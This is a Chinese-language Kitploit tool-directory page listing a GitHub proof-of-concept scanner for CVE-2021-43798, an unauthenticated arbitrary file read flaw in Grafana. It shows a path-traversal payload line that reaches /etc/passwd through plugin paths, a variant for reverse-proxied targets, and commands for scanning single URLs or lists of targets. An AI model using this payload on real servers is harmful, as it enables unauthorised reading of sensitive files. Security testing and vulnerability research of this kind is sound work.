Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-43798-grafana_fileread — grafana CVE-2021-43798任意文件读取漏洞POC,采用多插件轮训检测的方法,允许指定单URL和从文件中读取URL | Kitploit
工具/GitHubGitHub/moch3n/cve-2021-43798-grafana_fileread
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubmoch3n/cve-2021-43798-grafana_fileread

CVE-2021-43798-grafana_fileread

grafana CVE-2021-43798任意文件读取漏洞POC,采用多插件轮训检测的方法,允许指定单URL和从文件中读取URL

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
1714年前尚未审核
分享

CVE-2021-43798-grafana_fileread

如果对象经过反向代理处理,可以将payload替换成这条

root@kitploit:~
url1 = url +"/public/plugins/"+str.rstrip(plugins)+"/#/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。
Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。

CVE: CVE-2021-43798
组件: Grafana 漏洞类型: 文件读取
影响: 获取敏感信息
简述: 未授权的攻击者利用该漏洞,能够获取服务器敏感文件

使用说明

1、对单个URL进行检测

root@kitploit:~
python3 grafana_fileread.py -u http://localhost:3000

image 获取到的数据能够在grafana 8.x_fileread_vuln.txt文件中查看 image 2、对文件内的IP进行检测

root@kitploit:~
python3 grafana_fileread.py -u http://localhost:3000

image

3、-h 查看帮助 image

下载工具